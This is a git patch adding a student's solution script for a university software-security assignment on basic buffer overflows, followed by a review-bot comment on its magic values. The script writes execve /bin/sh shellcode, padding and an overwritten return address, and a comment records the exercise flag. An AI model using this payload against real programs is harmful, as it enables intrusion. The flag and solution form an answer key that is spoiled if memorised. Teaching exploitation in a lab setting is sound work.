From b040e57d500f57b2e71193c8d8d14b5cd3a7a236 Mon Sep 17 00:00:00 2001
From: Sascha Tommasone
Date: Fri, 14 Jun 2024 15:47:00 +0200
Subject: [PATCH] [Assignment-6] solution task 6 (basic buffer overflow attack)
---
.../basic_overflow/solution.sh | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100755 Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh
diff --git a/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh
new file mode 100755
index 0000000..6c47ae7
--- /dev/null
+++ b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+# flag{THAT_WAS_EASY_HUH}
+
+######### Exploit #########
+# Step 1: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+
+# Step 2: Fill the buffer with 'A's until the stored EIP is reached
+printf "A%.0s" {1..91}
+
+# Step 3: Overwrite the stored EIP with the address of the shellcode
+printf "\x2c\xd5\xff\xff"
+###########################
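Review bot: The padding count `91` in Step 2 and the return address `\x2c\xd5\xff\xff` in Step 3 are unexplained magic values, and nothing in the script says under which conditions they hold. The Step 1 string is 21 bytes, so the stored EIP sits 112 bytes past the start of the payload; saying so in the Step 2 comment would make the number checkable. A hard-coded stack address only stays valid when the address layout is fixed, so the script presumably depends on the course binary running without ASLR, a stack protector or a non-executable stack. A header comment naming the target binary and those assumptions would record which mitigations the exercise demonstrates the absence of, for example `# Assumes lab setup: ASLR off, no stack protector, executable stack`.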